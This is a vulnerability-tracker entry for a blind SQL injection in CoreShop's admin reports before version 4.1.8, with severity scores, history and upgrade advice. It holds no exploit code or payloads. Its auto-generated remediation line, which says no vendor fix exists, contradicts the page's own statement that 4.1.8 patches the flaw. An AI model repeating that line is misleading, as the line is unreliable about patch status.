Description
CoreShop is a Pimcore enhanced eCommerce solution. Prior to version 4.1.8, a blind SQL injection vulnerability exists in the application that allows an authenticated administrator-level user to extract database contents using boolean-based or time-based techniques. The database account used by the application is read-only and non-DBA, limiting impact to confidential data disclosure only. No data modification or service disruption is possible. This issue has been patched in version 4.1.8.
Published: 2026-01-08
Score: 4.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Database Confidentiality Disclosure
Action: Patch Immediately
AI Analysis

Impact

The vulnerability is a blind SQL injection that exists in CoreShop before version 4.1.8. An authenticated administrator can use boolean-based or time-based techniques to extract data from the read‑only database account. Because the database account is non‑DBA, an attacker cannot modify data or disrupt services; the main risk is disclosure of confidential information.

Affected Systems

The affected product is CoreShop from the coreshop vendor. All releases prior to 4.1.8 are vulnerable, and the patch addressing the flaw was introduced in that version. No other product versions are indicated as affected.

Risk and Exploitability

The CVSS score of 4.9 places the vulnerability in the medium severity range, while the EPSS score of less than 1% indicates a very low likelihood of exploitation. The flaw is not listed in CISA’s Known Exploited Vulnerabilities catalog. The attack chain requires authenticated administrator credentials, enabling an insider or compromised account to repeatedly submit crafted queries to read data via blind techniques. No data modification or service disruption is possible from this vector.

Generated by OpenCVE AI on April 18, 2026 at 07:43 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade CoreShop to version 4.1.8 or later to eliminate the SQL injection flaw.
  • Limit administrator account privileges and apply the principle of least privilege when creating admin users.
  • Enable detailed logging and monitor for anomalous database queries or prolonged time-based delays that may signal exploitation attempts.

Generated by OpenCVE AI on April 18, 2026 at 07:43 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-ch7p-mpv4-4vg4 CoreShop Vulnerable to SQL Injection via Admin Reports
History

Mon, 12 Jan 2026 16:45:00 +0000

Type Values Removed Values Added
First Time appeared Coreshop
Coreshop coreshop
Weaknesses CWE-89
CPEs cpe:2.3:a:coreshop:coreshop:*:*:*:*:*:*:*:*
Vendors & Products Coreshop
Coreshop coreshop

Thu, 08 Jan 2026 18:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 08 Jan 2026 10:15:00 +0000

Type Values Removed Values Added
Description CoreShop is a Pimcore enhanced eCommerce solution. Prior to version 4.1.8, a blind SQL injection vulnerability exists in the application that allows an authenticated administrator-level user to extract database contents using boolean-based or time-based techniques. The database account used by the application is read-only and non-DBA, limiting impact to confidential data disclosure only. No data modification or service disruption is possible. This issue has been patched in version 4.1.8.
Title CoreShop Vulnerable to SQL Injection via Admin Reports
Weaknesses CWE-564
References
Metrics cvssV3_1

{'score': 4.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}

Subscriptions

Coreshop Coreshop
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-01-08T14:26:19.902Z

Reserved: 2026-01-07T05:19:12.920Z

Link: CVE-2026-22242

cve-icon Vulnrichment

Updated: 2026-01-08T14:26:10.948Z

cve-icon NVD

Status : Analyzed

Published: 2026-01-08T10:15:56.127

Modified: 2026-01-12T16:42:51.783

Link: CVE-2026-22242

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T07:45:24Z

Weaknesses